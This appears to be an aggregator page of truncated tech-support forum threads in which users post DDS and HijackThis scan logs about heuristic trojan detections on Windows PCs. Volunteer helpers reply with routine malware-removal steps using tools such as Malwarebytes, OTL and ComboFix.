All kinds of odd behaviour going on. Mousepad is touch sensitive and can't change it, Windows Defender blocked, updates blocked, browser being redirected. System restore is disabled too, which might be a good thing. Have run scans in normal and safe mode with Malwarebytes, AVG, Superantispyware - nothing seems to work: some are removed but new ones pop up. AVG shows presence of Win32/Heur but other apps have shown hundreds of others - rootkits, Virtumonde, Smitfraud. Seems to fit with Win32/Heur, from what I can tell; self-replicating.

I'm not a complete novice but I'm no whizzkid so be gentle. But boy, do I need some help!
DDS (Ver_09-03-16.01) - NTFSx86
Run by anthony at 22:56:17.32 on 21/04/2009
Internet Explorer: 7.0.5730.13
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.1022.420 [GMT 1:00]

AV: AVG Anti-Virus Free *On-access scanning enabled* (Updated)

============== Running Processes ===============

C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\Program Files\Windows Defender\MsMpEng.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k WudfServiceGroup
C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
C:\Program Files\AVG\AVG8\avgrsx.exe
C:\Program Files&... Read more

A:Trojan attack - win32/Heur

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.comDDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the resul... Read more

2 more replies
Answer Match 51.66%

Hi, this is a customer of mine's log file...they have the HEUR:Trojan.Script.Generic trojan and I can't seem to remove it. They do an awful lot of online banking/deposits/accounting on that system and seems pretty risky with this little bug...any help would be appreciated. Below are the logs I could run on their system...

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 5:24:59 PM, on 6/24/2014
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v11.0 (11.00.9600.17126)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\avpui.exe
c:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
C:\Program Files (x86)\ATI Technologies\HydraVision\HydraDM.exe
C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe
C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\715\g2ax_user_customer.exe
C:\PROGRA~2\Raptr\raptr.exe
C:\PROGRA~2\Raptr\raptr_im.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Trend Micro\HiJackThis\HiJackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.msn.com/HPDSK14/1
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go... Read more

A:HEUR:Trojan.Script.Generic

9 more replies
Answer Match 51.66%

ZA found heur.win32.trojan.generic this morning. The computer hasn't been "right" for about a week. Nothing major. Went looking when my monitor stopped hibernating, and acrobat reader and flash would not update or work. I found that my allow remote assistance box was clicked. (I would never allow that even if such a thing was hinted at). The above trojan is quarantined, but I do my trading from this computer and i always thought I've been careful but now i need to make sure.

Posting the logs. I have saved the virus logs from ZA also. There was another virus last week but I didn't jot down the name, just copied the log entry from ZA. sorry
DDS (Ver_09-07-30.01) - NTFSx86
Run by Administrator at 15:43:48.95 on Thu 09/17/2009
Internet Explorer: 7.0.5730.11
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.1023.544 [GMT -5:00]

AV: ZoneAlarm Extreme Security Antivirus *On-access scanning enabled* (Updated) {5D467B10-818C-4CAB-9FF7-6893B5B8F3CF}
AV: Norton AntiVirus *On-access scanning enabled* (Outdated) {E10A9785-9598-4754-B552-92431C1C35F8}
FW: Norton Internet Worm Protection *enabled* {990F9400-4CEE-43EA-A83A-D013ADD8EA6E}
FW: ZoneAlarm Extreme Security Firewall *enabled* {829BDA32-94B3-44F4-8446-F8FCFF809F8B}

============== Running Processes ===============

C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\svchost -k DcomLaunch
C:\WINDOWS\system32\svchost -k rpcss
C:\WINDOWS\... Read more

A:heur.win32.trojan.generic

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the results.Foll... Read more

2 more replies
Answer Match 51.66%

I have been cleaning up my system for a few weeks now. And it is booting and running as fast as it ever has.
Most scans have come up with tracking cookies and adware. Which I cliked on remove.
Last night Zonealarm popped this one up as an alert
 
C:\DOCUMENTS AND SETTINGS \JERRY\DESKTOP\GUSETUP.EXE//DATA0202
HEUR Trojan Win 2 StartPage
 
 
Dds Report
 
DDS (Ver_2012-11-20.01) - NTFS_x86
Internet Explorer: 8.0.6001.18702 BrowserJavaVersion: 10.25.2
Run by jerry at 9:57:35 on 2013-08-12
Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1033.18.3325.2366 [GMT -7:00]
.
AV: ZoneAlarm Antivirus *Enabled/Updated* {5D467B10-818C-4CAB-9FF7-6893B5B8F3CF}
FW: ZoneAlarm Firewall *Enabled*
FW: AVG Firewall *Disabled*
.
============== Running Processes ================
.
C:\Program Files\CheckPoint\ZAForceField\IswSvc.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\SUPERAntiSpyware\SASCORE.EXE
C:\Program Files\CheckPoint\ZAForceField\ForceField.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Acronis\Schedule2\schedul2.exe
C:\Program Files\Common Files\Acronis\CDP\afcdpsrv.exe
C:\Program Files\Common Files\Acronis\Schedule2\schedhlp.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\NVIDIA Corporation\nTune\nTuneService.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\Program Files\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
C:\Program Files\Common Files\Acronis\SyncAgent\syncagentsrv.exe
C:\Program Files\NVIDIA Corporation\nTune\nTuneCmd.exe
C:... Read more

A:New Za Alert, HEUR Trojan Win 2 StartPage

Good evening. C:\DOCUMENTS AND SETTINGS \JERRY\DESKTOP\GUSETUP.EXE - Can you tell me where you got this file from?
 
 
 

25 more replies
Answer Match 51.66%

i want get in this link .. it was not like this before .. please help

A:Please Help HEUR:Trojan.Script.Iframer

You would have to exit/ turn off your Kaspersky. You need to ask yourself is it worth the risk of a serious infection to do that just to
watch a second rate pirated movie.

1 more replies
Answer Match 51.66%

Someone in my family has managed to get a nasty infection on the computer. I'm unable to open MalwareBytes; the computer searches for the program and says it doesn't exist. When I try to re-download it, it gives me an error message that says "Unable to execute file" with the program name, and "CreateProcess failed; Code2. The system cannot find the file specified." Suzezufu is now in my start up menu, and I saw that it has a registry entry, which I've had no luck getting rid of. Trojan.Heur has been quarantined by BitDefender, but BD can't get rid of it. At a loss and at wits end I have the DDS and ark logs. Thanks in advance for any help.

DDS (Ver_09-10-26.01) - NTFSx86
Run by Michelle at 20:40:39.95 on Thu 11/05/2009
Internet Explorer: 8.0.6001.18702 BrowserJavaVersion: 1.6.0_14
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.446.72 [GMT -5:00]

AV: Bitdefender Antivirus *On-access scanning enabled* (Updated) {6C4BB89C-B0ED-4F41-A29C-4373888923BB}
FW: Bitdefender Firewall *enabled* {4055920F-2E99-48A8-A270-4243D2B8F242}

============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k WudfServiceGroup
svchost.exe
svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\e-Trends\etrnd.exe
C:\WINDOWS\Explorer.EXE
svchost.exe
C:&#... Read more

A:Infected with suzezufu and Trojan.Heur, maybe more

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. Please include a clear description of the problems you're having, along with any steps you may have performed so far.Please refrain from running tools or applying updates other than those we suggest while we are cleaning up your computer. The reason for this is so we know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.Even if you have already provided information about your PC, we need a new log to see what has changed since you originally posted your problem.Please download OTL from following mirror:This is THE MirrorSave it to your desktop.Double click on the icon on your desktop.Click the "Scan All Users" checkbox.Push the button.Two reports will open, copy and paste them in a reply here:OTL.txt <-- Will be openedExtra.txt <-- Will be minimizedIn the upper right hand corner ... Read more

2 more replies
Answer Match 51.66%

Well, my computer has a trojan on it and it started to run slow since yesterday. I ran Spyware Hunter, AlYac, SuperAntiSpyware in safe mode but it keeps coming back, as well as some other adware and something called Trojan.clicker. I don't know what else is running differently but my computer is really slow now.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 5:47:42 PM, on 8/29/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16850)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\ESTsoft\ALYac\AYServiceNt.aye
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\Common Files\LogiShrd\LVMVFM\LVPrcSrv.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\Program Files\Spyware Doctor\pctsAuxs.exe
C:\Program Files\Spyware Doctor\pctsSvc.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Viewpoint\Common\ViewpointService.exe
C:\WINDOWS\System32\alg.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\SOUNDMAN.EXE
C:\WINDOWS\system32\RUNDLL32.E... Read more

A:Slowed down computer Trojan.Heur

soemobdy please help me
 

3 more replies
Answer Match 51.66%

i performed a full deep scan with bitdefender 2009 and it found the following:

Gen Trojan Heur 25:

C:\Program Files\HP\Quickplay\QPService.exe (memory dump)
C:\Program Files\Bitdef....Bitdefender2009\seccenter.exe (memory dump)
C:\Program Files\HP\Quickplay\Kernal\TV\CLCapSvc.exe (memory dump)
C:\Program Files\Common Files\LightScribe\LSSrvc.exe (memory dump)
C:\Program Files\HP\Quickplay\Kernal\TV\CLSched.exe (memory dump)
C:\Program Files\Windows Media Player\WMPNSCFG.exe (memory dump)
C:\Program Files\Windows Media Player\wmpnetwk.exe (memory dump)
C:\windows\system32\notepad.exe (memory dump)

i have no idea what to do..i have tried searching on removing this trojan but have not found any solid information
if anybody could point me int he right direction or guide me it woud be greatly appreciated
please help

A:Gen Trojan Heur 25 (memory dump)

Please download Malwarebytes Anti-Malware and save it to your desktop.alternate download link 1alternate download link 2If you have a previous version of MBAM, remove it via Add/Remove Programs and download a fresh copy.Make sure you are connected to the Internet.Double-click on mbam-setup.exe to install the application.When the installation begins, follow the prompts and do not make any changes to default settings.When installation has finished, make sure you leave both of these checked:Update Malwarebytes' Anti-MalwareLaunch Malwarebytes' Anti-MalwareThen click Finish.MBAM will automatically start and you will be asked to update the program before performing a scan.If an update is found, the program will automatically update itself.Press the OK button to close that box and continue.If you encounter any problems while downloading the updates, manually download them from here and just double-click on mbam-rules.exe to install. Alternatively, you can update through MBAM's interface from a clean computer, copy the definitions (rules.ref) located in C:\Documents and Settings\All Users\Application Data\Malwarebytes\Malwarebytes' Anti-Malware from that system to a usb stick or CD and then copy it to the infected machine.On the Scanner tab:Make sure the "Perform Quick Scan" option is selected.Then click on the Scan button.If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button.The scan will begin and "Scan in progress" will show at th... Read more

1 more replies
Answer Match 51.66%

Hi, and thanks in advance for your help! I'm running Windows XP and accidently clicked on a web page that immediately slowed my computer down to a crawl so I'm pretty sure that's where the infection came from. I scanned my computer first with bitdefender and it found 16 instances of this virus. I rebooted and scanned again and it found 22 instances. I'm anxious to get rid of this thing as it's making my computer run extremely hot.

A:Infected by trojan.heur.vundo.1

Hello and welcome please run these next. If you have Spybot installed temporarily disable it.Next run ATF:Please download ATF Cleaner by Atribune & save it to your desktop.Double-click ATF-Cleaner.exe to run the program.Under Main "Select Files to Delete" choose: Select All.Click the Empty Selected button.If you use Firefox browser click Firefox at the top and choose: Select AllClick the Empty Selected button.
If you would like to keep your saved passwords, please click No at the prompt.If you use Opera browser click Opera at the top and choose: Select AllClick the Empty Selected button.
If you would like to keep your saved passwords, please click No at the prompt.Click Exit on the Main menu to close the program.Note: On Vista, "Windows Temp" is disabled. To empty "Windows Temp" ATF-Cleaner must be "Run as an Administrator".Next run MBAM:Please download Malwarebytes Anti-Malware (v1.32) and save it to your desktop.alternate download link 1alternate download link 2If you have a previous version of MBAM, remove it via Add/Remove Programs and download a fresh copy.Make sure you are connected to the Internet.Double-click on mbam-setup.exe to install the application.When the installation begins, follow the prompts and do not make any changes to default settings.When installation has finished, make sure you leave both of these checked:Update Malwarebytes' Anti-MalwareLaunch Malwarebytes' Anti-MalwareThen click Finish.MBAM will automatically start and you will be asked to update... Read more

7 more replies
Answer Match 51.66%

For the past couple years I have been using AVG free, but within the last week I noticed a lot of viruses that couldn't be removed. So I did some research and got a subscription to BitDefender.

The first scan found a large number of infections all in the same 2 files: ebtnja.dll AND khfyxrgb.dll

I ran a scan again before posting this request, and now only the KHFYXRJB.DLL is showing up as infected. And now its only 3 times.

BitDefender is unable to heal, delete, or quarantine the files, so I'm not sure what to do. The exact name of the infection is Gen:Trojan.Heur.544453

I haven't noticed any effects other than some slowness, and every time I log off/shut down explorer has to be ended manually.
Here's the report.. HJT I think? The required one.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 12:20:31 PM, on 2/3/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18372)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\BitDefender\BitDefender 2009\vsserv.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C... Read more

A:Can't Remove Trojan Heur from System32

Hi Welcome to TSG!!

Download ComboFix from one of these locations:

Link 1
Link 2
Link 3

**Note: It is important that it is saved directly to your desktop**

--------------------------------------------------------------------

With malware infections being as they are today, it's strongly recommended to have the Windows Recovery Console pre-installed on your machine before doing any malware removal.

The Windows Recovery Console will allow you to boot up into a special recovery (repair) mode. This allows us to more easily help you should your computer have a problem after an attempted removal of malware. It is a simple procedure that will only take a few moments of your time.
Go to Microsoft's website => http://support.microsoft.com/kb/310994

Select the download that's appropriate for your Operating System


Download the file & save it as it's originally named.
Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with our tools.

Please note once you start ComboFix you should not click anywhere on the ComboFix window as it can cause the program to stall.

Drag the setup package onto ComboFix.exe and drop it.

Follow the prompts to start ComboFix and when prompted, agree to the End-User License Agreement to install the Microsoft Recovery Console.

At the next prompt, click 'Yes' to run the full ComboFix scan.

When the tool is finished, it ... Read more

1 more replies
Answer Match 51.66%

Hello guys. I got infected with this Trojan today. I was unable to open Chrome, explorer.exe or task manager. My Kaspersky tried to repair it, but the only solution was deleting the file. After that, I rebooted the PC and I could open Chrome and so on, but my PC is extremely slow. I don't know if Kaspersky was able to deal with the malware, if anyone could check it would be awesome.
 
Thanks in advance.

More replies
Answer Match 51.66%

I've newly acquired my mom's hp pavilion dv6-3129nr Entertainment Notebook, running Windows 7 and have off and on checked in on it and installed Kapersky Antivirus. I decided to do a full scan and discovered the above infection wich Kapersky says that it did not process and is non-overwriteable. See entire file below:

19.08.2015 08.41.15;Object (file) not processed.;C:\Users\Jolanta Jachimczyk\Downloads\_br __//Postal-Receipt.exe;C:\Users\Jolanta Jachimczyk\Downloads\_br __//Postal-Receipt.exe;HEUR:Trojan.Win32.Generic;Non-overwritable

I tried using a google search which told me to use Kapersky's TDSSKiller, but after running it, it found no infection. Since I consider myself a novice I figured I would turn to the boards before doing any more downloading of any programs. Please let me know what other information I need to provide in order to remove this infection. Thank you.
 

A:Help with HEUR.Trojan.Win32.Generic

Hello olabola,

Welcome to Tech Support Guy!

My name is Cody and I'll be helping you clean up your computer.

I will reply to your posts as soon as possible -- typically within 24 hours. I do ask that you please respond within 72 hours. If you know you will be away longer than that, I just ask for notice ahead of time.

Please do note any time differences between us. If I do not respond within 48 hours, feel free to send me a private message.

====================================================

Some points for you to keep in mind:

Backup any files that cannot be replaced. Removing malware can be unpredictable and this step can save a lot of heartaches if things don't go as planned.
We ask you to run different tools in a specific order to ensure the malware is completely removed from your machine, and running any additional tools may detect false positives, interfere with our tools, or cause unforeseen damage or system instability.
Copy and paste scan results unless asked to attach to a reply.
Once things seem to be working again, please do not abandon the thread. I will give an "all-clean" message at the very end with some additional information on how to stay malware-free.
====================================================

If possible, run the following while within Windows normally. If that is not possible, try from within Safe Mode.

Farbar Recovery Scan Tool (FRST)

Download Farbar Recover Scan Tool for either 32 bit or 64 bit systems and save... Read more

14 more replies
Answer Match 51.66%

Hi there. I first noticed the problem when conducting a search via Chrome browser. The link I clicked on was redirected to a different site. I ran full scans with MSE, SpybotS&D, Avast, AVG, Kaspersky, and Malwarebytes. Several of these, including Malwarebytes and Spybot indicated a virus and removed it, but the browser issue persisted. Kaspersky showed "HEUR:Trojan" in its report.

Please see log file as requested below. I've also pasted report from Kasperky's free scan product.

Thanks in advance for the help.

DDS Log
DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 8.0.7600.17153 BrowserJavaVersion: 10.9.2
Run by Acer at 19:36:29 on 2013-01-29
Microsoft Windows 7 Home Premium 6.1.7600.0.1252.1.1033.18.3764.1188 [GMT -5:00]
.
AV: avast! Antivirus *Enabled/Updated* {2B2D1395-420B-D5C9-657E-930FE358FC3C}
AV: Microsoft Security Essentials *Enabled/Updated* {B140BF4E-23BB-4198-90AB-A51A4C60A69C}
SP: Microsoft Security Essentials *Enabled/Updated* {0A215EAA-0581-4E16-AA1B-9E6837E7EC21}
SP: avast! Antivirus *Enabled/Updated* {904CF271-6431-DA47-5FCE-A87D98DFB681}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
c:\Program Files\Microsoft Security Client\MsMpEng.exe
C:\Windows&#... Read more

A:HEUR:Trojan.Win32.Generic

HelloThese are the programs I would like you to run next, if you have any problems with these just skip it and run the next one.-AdwCleaner-Please download AdwCleaner by Xplode onto your desktop.
Close all open programs and internet browsers.Double click on AdwCleaner.exe to run the tool.Click on Delete.Confirm each time with Ok.Your computer will be rebooted automatically. A text file will open after the restart.Please post the content of that logfile with your next answer.You can find the logfile at C:\AdwCleaner[S1].txt as well.--RogueKiller-- Download & SAVE to your Desktop RogueKiller or from here
Quit all programs that you may have started. Please disconnect any USB or external drives from the computer before you run this scan! For Vista or Windows 7, right-click and select "Run as Administrator to start"For Windows XP, double-click to start. Wait until Prescan has finished ... Then Click on "Scan" button Wait until the Status box shows "Scan Finished"click on "delete" Wait until the Status box shows "Deleting Finished" Click on "Report" and copy/paste the content of the Notepad into your next reply.The log should be found in RKreport[1].txt on your DesktopExit/Close RogueKiller+Gringo

14 more replies
Answer Match 51.66%

I am using Counterspy which identifies and quarantines this trojan, however it requires a restart to fully remove it.

Upon start up I get a screen doing a 'boot scan' with some files it is unable to delete. I am then unable to move beyond this screen after the scan and I'm forced to 'escape' the boot scan.

I have pop ups when online and am unable to use auto updater for windows despite it being set as a preference. My HJT log is below and I'd appreciate it if you could find the time to assist me.
Many thanks.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 4:56:13 PM, on 2/5/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP3 (6.00.2900.5512)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\stsystra.exe
C:\Program Files\Dell\Media Experience\DMXLauncher.exe
C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe
C:\Program Files\Java\jre1.6.0_03\bin\jusched.exe
C:\Program Files\Sunbelt Software\CounterSpy\SBAMTray.exe
C:\Program Files\Digital Line Detect\DLG.exe
C:\Program Files\FinePixViewer\QuickDCF.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpotdd01.exe
c:\program files\mcafee.com\agent\mcdetect.exe
c:\PROG... Read more

A:Battling Heur Trojan and requesting help

14 more replies
Answer Match 51.66%

I run BitDefender 2009. All problems were cleaned but one. BitDefender labels this virus as Gen:trojan.heur.564.E44 It tells me the infected file is C:\WINDOWS\system32\jkkHYrOE.dll

I'm unable to delete the file and the earliest system restore point is the the exact moment the file was created (6:36 pm on 2-14-09)

A portion of my most recent scan log reads as follows:

Remaining issues:Object Name Threat Name Final Status
[System]=]HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{801A5890-4CD6-46FF-96B6-4122589EAAE3}=]C:\WINDOWS\SYSTEM32\JKKHYROE.DLL Gen:Trojan.Heur.564E44 Infected
C:\WINDOWS\system32\jkkHYrOE.dll Gen:Trojan.Heur.564E44 No action was possible
C:\WINDOWS\system32\jkkHYrOE.dll Gen:Trojan.Heur.564E44 No action was possible

This is slowing down my computer immensely and creating pop-up ads for fake anti-virus software every time I change a web page. Any help would be greatly appreciated. Thanks in advance.

A:Infected with Trojan.heur.564E44

Hi and welcome to BleepingComputer Let's take a look with MalwarebytesThe process of cleaning your computer may require temporarily disabliling some security programs. If you are using SpyBot Search and Destroy, please refer to Note 2 at the bottom of this page.Please download Malwarebytes Anti-Malware and save it to your desktop.alternate download link 1alternate download link 2Make sure you are connected to the Internet.Double-click on mbam-setup.exe to install the application.When the installation begins, follow the prompts and do not make any changes to default settings.When installation has finished, make sure you leave both of these checked:Update Malwarebytes' Anti-MalwareLaunch Malwarebytes' Anti-MalwareThen click Finish.MBAM will automatically start and you will be asked to update the program before performing a scan.If an update is found, the program will automatically update itself.Press the OK button to close that box and continue.If you encounter any problems while downloading the updates, manually download them from here and just double-click on mbam-rules.exe to install.On the Scanner tab:Make sure the "Perform Quick Scan" option is selected.Then click on the Scan button.If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button. The scan will begin and "Scan in progress" will show at the top. It may take some time to complete so please be patient.When the scan is finished, a message box will say "The scan complet... Read more

3 more replies
Answer Match 51.24%

For some reason, I couldn't put the DDS to the desktop (it went to my downloads) and couldn't paste the dds.txt here as asked.
Sorry, I couldn't copy and paste it here, but the files are  below.
Please advise.

A:HEUR/Modified.SystemFile trojan in user32.DLL

Hello and welcome to Bleeping Computer! I am HelpBot: an automated program designed to help the Bleeping Computer Staff better assist you! This message contains very important information, so please read through all of it before doing anything.
We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.
To help Bleeping Computer better assist you please perform the following steps:
*************************************************** In order to continue receiving help at BleepingComputer.com, YOU MUST tell me if you still need help or if your issue has already been resolved on your own or through another resource! To tell me this, please click on the following link and follow the instructions there.CLICK THIS LINK >>> http://www.bleepingcomputer.com/logreply/531677 <<< CLICK THIS LINK
If you no longer need help, then all you needed to do was the previous instructions of telling me so. You can skip the rest of this post. If you do need help please continue with Step 2 below.
***************************************************If you still need help, I would like you to post a Reply to this topic (click the "Add Reply" button in the lower right hand of t... Read more

26 more replies
Answer Match 51.24%

Hey guys,
 
I am running Windows XP version 5.1.  Kaspersky (13.0.1.4190) has identified a variant of the HEUR Trojan.  Specifically, it is the HEUR:Exploit.java.cve-2012-0507.gen variant.  Kaspersky claims that it is impossible to disinfect.  It recommends ignoring it, which I do not think is the right answer.  There are numerous online tutorials that provide removal instructions, but I am hesitant to attempt any of them because there does not appear to be a consensus approach.  You guys helped me out back in 2010 (ridding a rather nasty infection) and I've been a big fan ever since.  Can you provide direction with this HEUR annoyance?
 
Many many thanks!
Caligula 

A:HEUR Trojan Variant Identified By Kaspersky

First clear the Java cache
 
How do I clear the Java cache?
 
 
Now go to that location to insure that file is deleted and scan again.

3 more replies
Answer Match 51.24%

My computer has been slow lately. I ran an antivirus scan and my MASM exes are infected with Trojan Horse Generic12.KDK and 4 Win32/Heur. I need some tips on keeping my computer safer, such as essential security programs and websites, as well as getting my laptop cleaned. I scanned with AVG Free.

Thank you.
 

A:Trojan Horse Generic12.KDK and 4 Win32/Heur

bump
Posted via Mobile Device
 

2 more replies
Answer Match 51.24%

Please Help
My Kaspersky scan has found this virus in system volume information files and files from RECYCLER I cannot upload these to Kaspersky as it says file invalid when I try.

I have run atf cleaner and superantispyware which does not detect anything. This virus seems to spread to more files each time I scan.

Thanks for your help in advance.

Here is my hijackthis log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 19:41:14, on 1/10/2010
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Adobe\Photoshop Elements 5.0\PhotoshopElementsFileAgent.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\dla\tfswctrl.exe
C:\Program Files\CyberLink\PowerDVD\DVDLauncher.exe
C:\Program Files\ScanSoft\OmniPageSE4.0\OpwareSE4.exe
C:\Program Files\Adobe\Photoshop Elements 5.0\apdproxy.exe
C:\P... Read more

More replies
Answer Match 51.24%

Hi!
I'm a newbie here, and I'm not sure exactly how to go about this.
I do know though that a topic about this trojan was locked....
My system's a Windows 7 Ultimate 32 bit,with having Windows Security Essentials and Avira! antivirus on it.
Windows Security Essentials wasn't able to catch it, but Avira! did.... in spite of that, it seemed that some of it was able to affect my laptop's system.
